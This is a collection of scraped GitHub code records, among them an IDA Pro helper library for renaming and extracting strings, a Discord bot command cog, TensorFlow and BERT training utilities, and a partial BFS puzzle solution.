IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, \r\n# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR \r\n# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE \r\n# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, \r\n# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE \r\n# OR OTHER DEALINGS IN THE SOFTWARE.\r\n#\r\n# HAVE A NICE DAY.\r\n\r\n# basicutils - a version-agnostic API for IDA Pro with some (slightly) higher level functionality\r\n# This is the 7.x version - see basicutils_6x for the 7.x version\r\nimport os\r\n\r\nimport ida_bytes\r\nimport ida_funcs\r\nimport ida_nalt\r\nimport ida_ua\r\nimport ida_name\r\nimport idc\r\nimport struct\r\nimport idautils\r\nimport ida_idaapi\r\nimport ida_segment\r\nimport re\r\n\r\nBADADDR = ida_idaapi.BADADDR\r\n\r\ndef SegByName(n):\r\n\tt = ida_segment.get_segm_by_name(n)\r\n\tif (t and t.start_ea != ida_idaapi.BADADDR):\r\n\t\tstart = t.start_ea\r\n\t\tend = t.end_ea\r\n\telse:\r\n\t\tstart = ida_idaapi.BADADDR\r\n\t\tend = ida_idaapi.BADADDR\r\n\treturn (start,end)\r\n\r\ndef GetFunctionName(x):\r\n\treturn idc.get_func_name(x)\r\n\r\ndef GetInputFile():\r\n\treturn idc.get_root_filename()\r\n\r\ndef GetIdbFile():\r\n return idc.get_idb_path()\r\n\r\ndef GetRootName():\r\n return os.path.join(os.path.dirname(GetIdbFile()), os.path.basename(GetInputFile()))\r\n\r\ndef NextFunction(x):\r\n\treturn idc.get_next_func(x)\r\n\r\ndef PrevFunction(x):\r\n\treturn idc.get_prev_func(x)\r\n\r\nMAX_OPCODE_LEN = 15\t\r\ndef PrevInstr(ea):\r\n # TODO this will return an inst_t type. Need to figure out how to populate it/make workflow happy\r\n\tout=ida_ua.insn_t()\r\n\tida_ua.decode_prev_insn(out, ea)\r\n\treturn out.ea\r\n\t\r\ndef CodeRefsTo(target):\r\n return idautils.CodeRefsTo(target,0)\r\n\r\ndef ForEveryUniqXrefTo( target, fun ):\r\n a = 0\r\n for xref in idautils.CodeRefsTo(target,0):\r\n if idc.get_func_attr(xref,idc.FUNCATTR_START) != a :\r\n fun(xref)\r\n a = idc.get_func_attr(xref, idc.FUNCATTR_START);\r\n \r\ndef ForEveryXrefTo( target, fun ):\r\n for xref in idautils.CodeRefsTo(target,0):\r\n fun(xref)\r\n\r\ndef ForEveryUniqXrefToD( target, fun ):\r\n a = 0\r\n for xref in idautils.CodeRefsTo(target,0):\r\n if idc.get_func_attr(xref,idc.FUNCATTR_START) != a :\r\n fun(xref, target)\r\n a = idc.get_func_attr(xref, idc.FUNCATTR_START);\r\n \r\ndef ForEveryXrefToD( target, fun ):\r\n for xref in idautils.CodeRefsTo(target,0):\r\n fun(xref, target)\r\n\r\ndef ForEveryFuncInDb( fun ):\r\n f = NextFunction(0)\r\n while (f != ida_idaapi.BADADDR):\r\n \"\"\"print \"ev: %#x\" % f\"\"\"\r\n fun(f)\r\n f=NextFunction(f)\r\n\r\ndef ForEveryFuncInSeg( seg, fun ):\r\n start,end = SegByName(\".text\")\r\n if (start == BADADDR):\r\n start = NextFunction(0)\r\n end = BADADDR\r\n f = start\r\n while (f < end):\r\n \"\"\"print \"ev: %#x\" % f\"\"\"\r\n print(f)\r\n fun(f)\r\n f=NextFunction(f)\t\t\r\n\t\t\r\n\t\t\r\ndef NFuncUp( fun, n ) :\r\n i=0\r\n f=fun\r\n while ((i__
\r\n#where and are in camel case.\r\n#This is not ideal for a number of reasons but this is a workaround for now\t\r\n\r\n#Return just the \"function name\" part of the canonical name\t\r\ndef GetCanonicalName(f):\r\n n = idc.get_func_name(f)\r\n parts = n.split(\"_\")\r\n if len(parts) == 3:\r\n return parts[1]\r\n else:\r\n return None\r\n\r\n#Put function in canonical format, given the function name and module name \r\ndef NameCanonical(f,mod_name,func_name):\r\n n = \"%s_%s_%08x\" % (mod_name,func_name,f)\r\n print(\"Renaming %s to %s\\n\" % (idc.get_func_name(f),n))\r\n ida_name.force_name(f,n)\r\n\r\n#Put function in canonical format when it doesn't have a name, but you know the module name \r\ndef RenameFuncWithAddr(f,s):\r\n func_name = \"unk\"\r\n NameCanonical(f,s,func_name)\r\n\r\n#Use this if you have pre-existing named functions in the DB that are in non-canonical format\r\ndef RenameRangeWithAddr(start,end,s):\r\n x = start\r\n while (x<=end):\r\n n = idc.get_func_name(x)\r\n if (n.startswith(\"sub_\")):\r\n RenameFuncWithAddr(x,s)\r\n else:\r\n NameCanonical(x,s,n)\r\n x = NextFunction(x)\r\n\t\t\r\n#Rename a function in canonical format without changing the module name\r\ndef CanonicalFuncRename(f,name):\r\n n = idc.get_func_name(f)\r\n parts = n.split(\"_\")\r\n new_name = \"%s_%s_%08x\" % (parts[0],name,f)\r\n print(\"Renaming %s to %s\\n\" % (n, new_name))\r\n ida_name.set_name(f,new_name)\r\n\r\n#Rename the module name without changing the function name\t\t\r\ndef RenameFuncWithNewMod(f,mod):\r\n n = idc.get_func_name(f)\r\n parts = n.split(\"_\")\r\n new_name = \"%s_%s_%08x\" % (mod,parts[1],f)\r\n print(\"Renaming %s to %s\\n\" % (n, new_name))\r\n ida_name.set_name(f,new_name)\r\n\r\n#Rename a module (all functions that start with _)\t\r\ndef RenameMod(orig, new):\r\n i = idc.get_next_func(0)\r\n while (i != BADADDR):\r\n n = idc.get_func_name(i)\r\n if n.startswith(orig+\"_\"):\r\n RenameFuncWithNewMod(i,new)\r\n i = NextFunction(i)\r\n\t\r\n#Just rename the module over a given range (can be used to split a module and give part a new name)\r\ndef RenameModRange(start, end, new):\r\n x = start\r\n while (x<=end):\r\n n = idc.get_func_name(x)\r\n RenameFuncWithNewMod(x,new)\r\n x = NextFunction(x)\r\n\t\t\r\n#Given a range of functions, some of which may have names and module names\r\n# and a module name, put names in canonical format \r\ndef CanonicalizeRange(start,end,mod):\r\n x = start\r\n while (x<=end):\r\n n = idc.get_func_name(x)\r\n #if it already starts with mod name, assume it's canonical\r\n if (not n.startswith(mod+\"_\")):\r\n if (n.startswith(\"sub_\")):\r\n RenameFuncWithAddr(x,mod)\r\n #this should be contains \"_\"\r\n elif (\"_\" in n):\r\n n = snakeToCamelCase(n)\r\n NameCanonical(x,mod,n)\r\n else:\r\n NameCanonical(x,mod,n)\r\n x = NextFunction(x)\t\r\n\r\n#Returns a string that is the concatenation of all of the string references from a function, separated by \r\n#Iterates through every item in function and looks for data references that are strings \r\ndef CompileTextFromFunction(f,sep):\r\n s=\"\"\r\n faddr = list(idautils.FuncItems(f))\r\n for c in range(len(faddr)):\r\n for d in idautils.DataRefsFrom(faddr[c]):\r\n t = ida_nalt.get_str_type(d)\r\n if ((t==0) or (t==3)):\r\n s += \" \"+ sep + \" \" + idc.GetStrLitContents(d)\r\n return s\r\n\r\n#Returns a string which is the concatenation all of the string references \r\n# for an address range in the program, separated by \r\n#Similar to above, but iterates over the whole set of functions in the given range \r\ndef CompileTextFromRange(start,end,sep):\r\n x = start\r\n s = \"\"\r\n while (x<=end):\r\n faddr = list(idautils.FuncItems(x))\r\n #print \"items list: %d\" % len(faddr)\r\n for c in range(len(faddr)):\r\n for d in idautils.DataRefsFrom(faddr[c]):\r\n #print \"Found ref at %x: %x \" % (faddr[c],d)\r\n t = ida_nalt.get_str_type(d)\r\n if ((t==0) or (t==3)):\r\n s += \" \" + sep + \" \" + GetStrLitContents(d).decode(\"utf-8\")\r\n x = NextFunction(x)\r\n return s\r\n\r\n#Returns a string which is a concatenation of all the function names in the given range\r\n# separated by \t\r\ndef CompileFuncNamesFromRangeAsText(start,end,sep):\r\n x = start\r\n s = \"\"\r\n while (x<=end):\r\n n = idc.get_func_name(x)\r\n if (not n.startswith(\"sub_\")):\r\n s += \" \" + sep + \" \" + n\r\n x = NextFunction(x)\r\n return s\r\n\t\r\n#helper function which checks for both ASCII and Unicode strings at the given ea\t\r\ndef GetStrLitContents(ea):\r\n potential_len = ida_bytes.get_max_strlit_length(ea, ida_nalt.STRTYPE_C_16)\r\n if(potential_len > 0):\r\n # If we get a non zero length, this is likely our string\r\n return ida_bytes.get_strlit_contents(ea, potential_len, ida_nalt.STRTYPE_C_16)\r\n # If we didn't get a good length out of C_16, try 8 bit strings\r\n potential_len = ida_bytes.get_max_strlit_length(ea, ida_nalt.STRTYPE_C)\r\n if(potential_len > 0):\r\n return ida_bytes.get_strlit_contents(ea, potential_len, ida_nalt.STRTYPE_C)\r\n #print(\"Error! %lu not a string\" % (ea))\r\n return \"\"\r\n","repo_name":"joxeankoret/diaphora","sub_path":"codecut/basicutils_7x.py","file_name":"basicutils_7x.py","file_ext":"py","file_size_in_byte":11842,"program_lang":"python","lang":"en","doc_type":"code","stars":3283,"dataset":"github-code","pt":"52"} +{"seq_id":"32272383211","text":"import discord\r\nfrom discord.ext import commands\r\nfrom modules.converters import *\r\nfrom modules.settings import CONFIG\r\n\r\nclass MiscCommands(commands.Cog, name='Misc Commands'):\r\n '''\r\n This category contains all the commands for fun, or are informational.\r\n '''\r\n def __init__(self, bot, **options):\r\n super().__init__(**options)\r\n self.bot = bot\r\n\r\n\r\n # Emoji command to show any emoji the bot can see\r\n @commands.command(brief=\"Use bot to display emoji.\")\r\n async def emoji(self, ctx, emoji_text, number=None):\r\n '''\r\n Makes the bot display an emoji for you. Enter the name of emoji only.\r\n\r\n Usage: !!emoji [emoji_name] (number is optional and defaults to 1)\r\n \r\n Eg. !!emoji crytilldie, !!emoji wesmart 5\r\n '''\r\n await ctx.message.delete()\r\n\r\n if number is None:\r\n number = 1\r\n try:\r\n number = int(number)\r\n except ValueError:\r\n raise(commands.BadArgument)\r\n\r\n author = ctx.author\r\n # Pad with colons to check emoji\r\n if not (emoji_text.startswith(':') and emoji_text.endswith(':')):\r\n emoji_text = ':' + emoji_text + ':'\r\n \r\n # Get emoji\r\n emoji = convert_emoji(self.bot, emoji_text)\r\n if number < 1 or number > 10:\r\n await ctx.send(f'Hm. {author.mention} Please enter a valid integer. (No overflows)') \r\n elif emoji:\r\n emoji *= number\r\n # Webhook to send emojis impersonating user\r\n wb = await ctx.channel.create_webhook(name=author.display_name)\r\n await ctx.message.delete()\r\n await wb.send(emoji, username=author.display_name, avatar_url=author.avatar_url)\r\n await wb.delete()\r\n else:\r\n await ctx.send(f'Hm. {author.mention} I couldn\\'t find `{emoji_text}`.')\r\n\r\n\r\n # Emoji ID for any emoji\r\n @commands.command(brief=\"Get the ID and name of any emoji.\")\r\n async def emojiid(self, ctx, emoji_text):\r\n '''\r\n Returns emoji ID and name of any emoji.\r\n\r\n Usage: !!emojiid [emoji_name]\r\n\r\n Eg. !!emojiid wesmart\r\n '''\r\n author = ctx.author\r\n # Pad with colons to check emoji\r\n if not (emoji_text.startswith(':') and emoji_text.endswith(':')):\r\n emoji_text = ':' + emoji_text + ':'\r\n \r\n emoji = convert_emoji(self.bot, emoji_text)\r\n if emoji:\r\n await ctx.send(f'Emoji name: {emoji.name}, Emoji ID: {emoji.id}')\r\n else:\r\n await ctx.send(f'{author.mention} I couldn\\'t find `{emoji_text}`.')\r\n\r\n\r\n # Check prefix of bot.\r\n @commands.command(brief='Current prefix of bot.')\r\n async def prefix(self, ctx):\r\n '''\r\n Shows the current prefix of the bot.\r\n\r\n Usage: !!prefix\r\n '''\r\n prefix = CONFIG.PREFIX\r\n await ctx.send(f'{ctx.author.mention}, the prefix is {prefix}')\r\n\r\n\r\n # Invite link. Please read this carefully.\r\n @commands.command(brief='Show invite link for bot.')\r\n async def invite(self, ctx):\r\n '''\r\n Get the invite link for the bot. Permissions required:\r\n - **View Audit Log** *(Logging purposes)*\r\n - **Manage Roles** *(Mute command)*\r\n - **Manage Channels** *(Mute command)*\r\n - **Manage webhooks** *(emoji replacements)*\r\n - **View Channels** *(for any command)*\r\n - **Send Messages** *(for any command)*\r\n - **Manage Messages** *(purge command and other commands)*\r\n - **Embed Links** *(many commands, including help)*\r\n - **Attach files** *(image commands)*\r\n - **Read Message History** *(purge commands)*\r\n - **Use External Emojis** *(reply to users)*\r\n\r\n Usage: !!invite\r\n '''\r\n author = ctx.author\r\n \r\n url = CONFIG.INVITE_URL\r\n inv = f'{author.mention} here is the invite link:\\n{url}'\r\n inv += '\\n\\nPlease do not forget to use `!!help invite` to verify permissions required!'\r\n await ctx.send(inv)","repo_name":"KrammyGod/DiscordPingBot","sub_path":"cogs/misc_commands.py","file_name":"misc_commands.py","file_ext":"py","file_size_in_byte":4064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73697883044","text":"'''\nfrom StyleClassifier\n'''\nimport tensorflow as tf \nimport numpy as np\nfrom tensorflow.python import debug as tf_debug \n\nLABEL_SEP = \"|||\"\nimage_dic = {}\nNUM_CLASS = 8\nIMAGE_SIZE = 64\nTRAIN_LABEL_FILE = \"../training-materials/ready/train/tf-images-with-labels.txt\"\nEVAL_LABEL_FILE = \"../training-materials/ready/eval/tf-images-with-labels.txt\"\nNUM_EXAMPLES_PER_EPOCH_FOR_TRAIN = 500\nNUM_EXAMPLES_PER_EPOCH_FOR_EVAL = 100\n\ndef read_labels_dict(filename):\n\twith open(filename, encoding='utf8') as f: \n\t\tlines = [line.rstrip('/\\n') for line in f]\n\t\tfor x in range(len(lines)):\n\t\t\tif(lines[x].find(LABEL_SEP)):\n\t\t\t\tpath, _, label = lines[x].partition(LABEL_SEP)\n\t\t\t\timage_dic[path]=label\n\n\ndef get_num_examples():\n\tread_labels_dict(TRAIN_LABEL_FILE)\n\treturn len(list(image_dic.keys()))\n\ndef distorted_inputs( batch_size):\n\t\"\"\"Construct distorted input for CIFAR training using the Reader ops.\n\n Args:\n\tdata_dir: Path to the CIFAR-10 data directory.\n\tbatch_size: Number of images per batch.\n\n Returns:\n\timages: Images. 4D tensor of [batch_size, IMAGE_SIZE, IMAGE_SIZE, 3] size.\n\tlabels: Labels. 1D tensor of [batch_size] size.\n \"\"\"\n\timage_list, label_list = read_labeled_image_list(TRAIN_LABEL_FILE)\n\tfor f in image_list:\n\t\tif not tf.gfile.Exists(f):\n\t\t\traise ValueError('Failed to find file: ' + f)\n\n\n\timages = tf.convert_to_tensor(image_list, dtype=tf.string)\n\tlabels = tf.convert_to_tensor(label_list, dtype=tf.int64)\n\t\n\t# Makes an input queue, produces the filenames to read and labels along with them\n\tinput_queue = tf.train.slice_input_producer([images, labels],\n\t\t\t\t\t\t\t\t\t\t\t\t#num_epochs=num_epochs,\n\t\t\t\t\t\t\t\t\t\t\t\tshuffle=True)\n\n\timage, label = read_images_from_disk(input_queue)\n\n\treshaped_image = tf.cast(image, tf.float32)\n\n\theight = IMAGE_SIZE\n\twidth = IMAGE_SIZE\n\n\t# Image processing for training the network. Note the many random\n\t# distortions applied to the image.\n\tdistorted_image = tf.image.resize_images(reshaped_image, [height, width])\n\t#note: per_image! input_queue is a list of single examples, so image is also a single image, \n\t#shuffle_batch(enqueue_many=False) is still appropriate. and so on\n\n\t# Randomly flip the image horizontally.\n\tdistorted_image = tf.image.random_flip_left_right(distorted_image)\n\n\t# Because these operations are not commutative, consider randomizing\n\t# the order their operation.\n\t# NOTE: since per_image_standardization zeros the mean and makes\n\t# the stddev unit, this likely has no effect see tensorflow#1458.\n\tdistorted_image = tf.image.random_brightness(distorted_image,\n\t\t\t\t\t\t\t\t\t\t\t max_delta=63)\n\tdistorted_image = tf.image.random_contrast(distorted_image,\n\t\t\t\t\t\t\t\t\t\t\t lower=0.2, upper=1.8)\n\n\t# Subtract off the mean and divide by the variance of the pixels.\n\t#mean = 0 afterwards\n\tfloat_image = tf.image.per_image_standardization(distorted_image)\n\n\t# Set the shapes of tensors.\n\tfloat_image.set_shape([height, width, 3])\n\n\t# Ensure that the random shuffling has good mixing properties.\n\tmin_fraction_of_examples_in_queue = 0.4\n\tmin_queue_examples = int(NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN *\n\t\t\t\t\t\t min_fraction_of_examples_in_queue)\n\tprint ('Filling queue with %d images before starting to train. '\n\t\t 'This will take a few minutes.' % min_queue_examples)\n\n\t# Generate a batch of images and labels by building up a queue of examples.\n\treturn _generate_image_and_label_batch(float_image, label,\n\t\t\t\t\t\t\t\t\t\t min_queue_examples, batch_size,\n\t\t\t\t\t\t\t\t\t\t shuffle=True)\n\ndef inputs(eval_data, batch_size):\n\t\"\"\"Construct input for CIFAR evaluation using the Reader ops.\n\t\t no random constrast, random brightness, etc \n\tArgs:\n\teval_data: bool, indicating if one should use the train or eval data set.\n\tdata_dir: Path to the CIFAR-10 data directory.\n\tbatch_size: Number of images per batch.\n\n\tReturns:\n\timages: Images. 4D tensor of [batch_size, IMAGE_SIZE, IMAGE_SIZE, 3] size.\n\tlabels: Labels. 1D tensor of [batch_size] size.\n\t\"\"\"\n\tif not eval_data:\n\t\timage_list, label_list = read_labeled_image_list(TRAIN_LABEL_FILE)\n\t\tnum_examples_per_epoch = NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN\n\telse:\n\t\timage_list, label_list = read_labeled_image_list(EVAL_LABEL_FILE)\n\t\tnum_examples_per_epoch = NUM_EXAMPLES_PER_EPOCH_FOR_EVAL\n\n\tfor f in image_list:\n\t\tif not tf.gfile.Exists(f):\n\t\t\traise ValueError('Failed to find file: ' + f)\n\n\timages = tf.convert_to_tensor(image_list, dtype=tf.string)\n\tlabels = tf.convert_to_tensor(label_list, dtype=tf.int64)#todo use 64 from the start?\n\n\tnum_examples_per_epoch = NUM_EXAMPLES_PER_EPOCH_FOR_EVAL\n\n\t# Makes an input queue\n\tinput_queue = tf.train.slice_input_producer([images, labels],\n\t\t\t\t\t\t\t\t\t\t\t\t#num_epochs=num_epochs,\n\t\t\t\t\t\t\t\t\t\t\t\tshuffle=True)\n\n\timage, label = read_images_from_disk(input_queue)\n\n\treshaped_image = tf.cast(image, tf.float32)\n\n\theight = IMAGE_SIZE\n\twidth = IMAGE_SIZE\n\n\t# Image processing for evaluation.\n\t# no distortions!\n\tresized_image = tf.image.resize_images(reshaped_image, [height, width])\n\tfloat_image = tf.image.per_image_standardization(resized_image)\n\tfloat_image.set_shape([height, width, 3])\n\n\t# Ensure that the random shuffling has good mixing properties.\n\tmin_fraction_of_examples_in_queue = 0.4\n\tmin_queue_examples = int(num_examples_per_epoch *\n\t\t\t\t\t\t min_fraction_of_examples_in_queue)\n\n\t# Generate a batch of images and labels by building up a queue of examples.\n\treturn _generate_image_and_label_batch(float_image, label,\n\t\t\t\t\t\t\t\t\t\t min_queue_examples, batch_size,\n\t\t\t\t\t\t\t\t\t\t shuffle=False)\n\ndef eval_all_inputs(eval_data):\n\tsample_count = get_num_examples()\n\treturn inputs(eval_data, sample_count)\n\ndef _generate_image_and_label_batch(image, label, min_queue_examples,\n\t\t\t\t\t\t\t\t\tbatch_size, shuffle):\n\t\"\"\"Construct a queued batch of images and labels.\n\n\tArgs:\n\timage: 3-D Tensor of [height, width, 3] of type.float32.\n\tlabel: 1-D Tensor of type.int32\n\tmin_queue_examples: int32, minimum number of samples to retain\n\t in the queue that provides of batches of examples.\n\tbatch_size: Number of images per batch.\n\tshuffle: boolean indicating whether to use a shuffling queue.\n\n\tReturns:\n\timages: Images. 4D tensor of [batch_size, height, width, 3] size.\n\tlabels: Labels. 1D tensor of [batch_size] size.\n\t\"\"\"\n\t# Create a queue that shuffles the examples, and then\n\t# read 'batch_size' images + labels from the example queue.\n\tnum_preprocess_threads = 16\n\tif shuffle:\n\t\timages, label_batch = tf.train.shuffle_batch(\n\t\t\t[image, label],\n\t\t\tbatch_size=batch_size,\n\t\t\tnum_threads=num_preprocess_threads,\n\t\t\tcapacity=min_queue_examples + 3 * batch_size,\n\t\t\tmin_after_dequeue=min_queue_examples)\n\telse:\n\t\timages, label_batch = tf.train.batch(\n\t\t\t[image, label],\n\t\t\tbatch_size=batch_size,\n\t\t\tnum_threads=num_preprocess_threads,\n\t\t\tcapacity=min_queue_examples + 3 * batch_size)\n\n\t# Display the training images in the visualizer.\n\ttf.summary.image('images', images)\n\n\treturn images, tf.reshape(label_batch, [batch_size])\n\n#https://stackoverflow.com/questions/34340489/tensorflow-read-images-with-labels\ndef read_labeled_image_list(image_list_file):\n\t\"\"\"Reads a .txt file containing pathes and labeles\n\tArgs:\n\t image_list_file: a .txt file with one /path/to/image per line\n\t label: optionally, if set label will be pasted after each line\n\tReturns:\n\t List with all filenames in file image_list_file\n\t\"\"\"\n\tf = open(image_list_file, 'r', encoding='utf8')\n\tfilenames = []\n\tlabels = []\n\tfor line in f:\n\t\tline = line.rstrip('\\n')\n\n\t\tfilename, _, label = line.partition(LABEL_SEP)#line[:-1].split(LABEL_SEP)\n\t\tfilenames.append(filename)\n\t\tlabels.append(int(label))\n\t\t\n\treturn filenames, labels\n\ndef read_images_from_disk(input_queue):\n\t\"\"\"Consumes a single filename and label as a ' '-delimited string.\n\tArgs:\n\t filename_and_label_tensor: A scalar string tensor.\n\tReturns:\n\t Two tensors: the decoded image, and the string label.\n\t\"\"\"\n\tlabel = input_queue[1]\n\tfile_contents = tf.read_file(input_queue[0])\n\texample = tf.image.decode_jpeg(file_contents, channels=3)\n\treturn example, label\n\n","repo_name":"calthaz/PanguML","sub_path":"TensorFlowDemo/python/read_image.py","file_name":"read_image.py","file_ext":"py","file_size_in_byte":7887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35061345616","text":"import os\nimport pickle\nimport time\nimport numpy as np\nimport sklearn.datasets as datasets\nfrom datasets_util import make_spiral, make_2_spiral, load_bsds, load_vidtimit, load_mnist\nfrom draw_utils import draw_3d_clusters, draw_spiral_clusters\nfrom acdt import ACDT\nnp.random.seed(42)\n\n\nif __name__ == '__main__':\n n = 2000\n k = 15\n l = 5\n d = 100\n\n digit = 9\n print('PROCESSING DIGIT %s' % digit)\n X = load_mnist('../data/MNIST/', digit=digit, n=n)\n X = X / 255\n\n total = time.time()\n acdt = ACDT(k, l, d, X, minimum_ckpt=50, store_every=1, visualize=False)\n acdt.fit()\n print('Took: %ss' % (time.time() - total))\n\n PATH = './saved/'\n os.makedirs(PATH, exist_ok=True)\n file_name = 'ckpt_mnist_%s.pickle' % digit\n with open(os.path.join(PATH, file_name), 'wb') as f:\n pickle.dump(acdt.checkpoints, f, protocol=pickle.HIGHEST_PROTOCOL)\n","repo_name":"JunkyByte/ACDT","sub_path":"src/acdt_mnist.py","file_name":"acdt_mnist.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"2676306495","text":"import torch \nfrom torch.utils.data import Dataset, DataLoader, RandomSampler, SequentialSampler\nimport transformers\nfrom sklearn import metrics\n\nclass CustomDataSet(Dataset):\n\n def __init__(self,dataframe,tokenizer,max_len):\n self.tokenizer = tokenizer\n self.data = dataframe\n self.comment_text = dataframe.text\n self.targets = self.data.list\n self.max_len = max_len\n\n def __len__(self):\n return len(self.comment_text)\n \n def __getitem__(self, index):\n comment_text = str(self.comment_text[index])\n comment_text = \" \".join(comment_text.split())\n\n inputs = self.tokenizer.encode_plus(\n comment_text,\n None,\n add_special_tokens=True,\n max_length=self.max_len,\n pad_to_max_length=True,\n return_token_type_ids=True\n )\n\n ids = inputs['input_ids']\n mask = inputs['attention_mask']\n token_type_ids = inputs['token_type_ids']\n\n return {\n 'ids': torch.tensor(ids,dtype=torch.long),\n 'mask': torch.tensor(mask,dtype=torch.long),\n 'token_type_ids': torch.tensor(token_type_ids, dtype=torch.long),\n 'targets': torch.tensor(self.targets[index], dtype=torch.float)\n }\n\nclass BERTClass(torch.nn.Module):\n\n def __init__(self,model_name):\n super(BERTClass, self).__init__()\n self.l1 = transformers.BertModel.from_pretrained(model_name)\n self.l2 = torch.nn.Dropout(0.2)\n self.l3 = torch.nn.Linear(128,1)\n \n def forward(self,ids,mask, token_type_ids):\n _ , output_1 = self.l1(ids, attention_mask = mask, token_type_ids = token_type_ids, return_dict=False)\n output_2 = self.l2(output_1)\n output = self.l3(output_2)\n\n return output\n\ndef loss_fn(outputs,targets):\n return torch.nn.BCEWithLogitsLoss()(outputs,targets)\n\ndef validation(epoch,hyperparameters,device,training_loader,model):\n model.eval()\n fin_targets = []\n fin_output = []\n\n with torch.no_grad():\n for _,data in enumerate(training_loader,0):\n ids = data['ids'].to(device,dtype=torch.long)\n mask = data['mask'].to(device,dtype=torch.long)\n token_type_ids = data['token_type_ids'].to(device,dtype=torch.long)\n targets = data['targets'].to(device,dtype=torch.float)\n s = targets.size(dim=0)\n targets = targets.resize(s,1)\n outputs = model(ids,mask,token_type_ids)\n\n t = (targets > 0.5).cpu().detach().numpy()\n for item in t:\n fin_targets.append(item[0])\n \n o = (torch.sigmoid(outputs) > 0.5).float().cpu().detach().numpy()\n for item in outputs:\n fin_output.append(torch.sigmoid(item).float().cpu().detach().numpy()[0])\n\n loss = loss_fn(outputs,targets)\n accuracy = metrics.accuracy_score(t,o)\n recall_micro = metrics.recall_score(t,o,average='micro')\n recall_macro = metrics.recall_score(t,o,average='macro')\n precision_micro = metrics.precision_score(t,o,average='micro')\n precision_macro = metrics.precision_score(t,o,average='macro')\n f1_score_micro = metrics.f1_score(t,o,average='micro')\n f1_score_macro = metrics.f1_score(t,o,average='macro')\n\n return accuracy, recall_macro, recall_micro, precision_macro, precision_micro, f1_score_macro, f1_score_micro, loss\n\ndef train(epoch,hyperparameters,device,training_loader,validation_loader,model,optimizer):\n\n param_dic = {'train':{},'validation':{}}\n\n accs = []\n recalls_mac = []\n recalls_mic = []\n precisions_mac = []\n precisions_mic = []\n f1s_mic = []\n f1s_mac = []\n losses = []\n\n v_accs = []\n v_recalls_mac = []\n v_recalls_mic = []\n v_precisions_mac = []\n v_precisions_mic = []\n v_f1s_mic = []\n v_f1s_mac = []\n v_losses = []\n\n model.train()\n example_ct = 0\n chk_count = 0\n for _,data in enumerate(training_loader,0):\n ids = data['ids'].to(device,dtype=torch.long)\n mask = data['mask'].to(device,dtype=torch.long)\n token_type_ids = data['token_type_ids'].to(device,dtype=torch.long)\n targets = data['targets'].to(device,dtype=torch.float)\n s = targets.size(dim=0)\n targets = targets.resize(s,1)\n\n outputs = model(ids,mask,token_type_ids)\n\n #maybe get rid of this! (zero_grad()) bad?\n optimizer.zero_grad()\n\n loss = loss_fn(outputs,targets)\n\n step_loss = loss.item()\n\n t = (targets > 0.5).cpu().detach().numpy()\n\n # makes outputs binary \n o = (torch.sigmoid(outputs) > 0.5).float().cpu().detach().numpy()\n\n # calculating metrics for training\n if _ % hyperparameters['log_freq'] == 0:\n accuracy = metrics.accuracy_score(t,o)\n recall_micro = metrics.recall_score(t,o,average='micro')\n recall_macro = metrics.recall_score(t,o,average='macro')\n precision_micro = metrics.precision_score(t,o,average='micro')\n precision_macro = metrics.precision_score(t,o,average='macro')\n f1_score_micro = metrics.f1_score(t,o,average='micro')\n f1_score_macro = metrics.f1_score(t,o,average='macro')\n\n accs.append(accuracy)\n recalls_mac.append(recall_macro)\n recalls_mic.append(recall_micro)\n precisions_mac.append(precision_macro)\n precisions_mic.append(precision_micro)\n f1s_mic.append(f1_score_micro)\n f1s_mac.append(f1_score_macro)\n losses.append(loss)\n\n val_metrics = validation(epoch,hyperparameters,device,validation_loader,model)\n v_accs.append(val_metrics[0])\n v_recalls_mac.append(val_metrics[1])\n v_recalls_mic.append(val_metrics[2])\n v_precisions_mac.append(val_metrics[3])\n v_precisions_mic.append(val_metrics[4])\n v_f1s_mac.append(val_metrics[5]) \n v_f1s_mic.append(val_metrics[6])\n v_losses.append(val_metrics[7])\n\n print('Checkpoint {} | F1 : {} | Rec : {} | Prec : {} |'.format(\n chk_count,f1_score_macro,recall_macro,precision_macro)\n )\n chk_count += 1\n\n #maybe get rid of this!\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n # put training parameters into a dictionary\n param_dic['train'] = {\n 'accuracy': accs,\n 'recall_macro': recalls_mac,\n 'recall_micro': recalls_mic,\n 'precisions_mac': precisions_mac,\n 'precisions_mic': precisions_mic,\n 'f1s_mac': f1s_mac,\n 'f1s_mic': f1s_mic,\n 'losses': losses\n }\n \n # put validaton parameters into a dictionary\n param_dic['validation'] = {\n 'accuracy': v_accs,\n 'recall_macro': v_recalls_mac,\n 'recall_micro': v_recalls_mic,\n 'precisions_mac': v_precisions_mac,\n 'precisions_mic': v_precisions_mic,\n 'f1s_mac': v_f1s_mac,\n 'f1s_mic': v_f1s_mic,\n 'losses': v_losses\n }\n\n return param_dic\n","repo_name":"jkaczmarzyk/RedditMentalHealth","sub_path":"training_utils.py","file_name":"training_utils.py","file_ext":"py","file_size_in_byte":7167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12817036307","text":"# baekjoon 3055 탈출\n\nimport sys\nimport collections\n\n\n# 고슴도치의 위치와 물의 위치에 모두 사용\nclass Node:\n def __init__(self, x, y, count=0):\n self.x = x\n self.y = y\n self.count = count\n\n\ndef escape(matrix):\n # 상 하 좌 우\n dx = [-1, 1, 0, 0]\n dy = [0, 0, -1, 1]\n\n # 방문 처리\n visit = [[-1 for i in range(len(matrix[0]))] for i in range(len(matrix))]\n\n # 고슴도치를 위한 큐\n s_queue_1 = collections.deque()\n s_queue_2 = collections.deque()\n # 물 번짐을 위한 큐\n w_queue_1 = collections.deque()\n w_queue_2 = 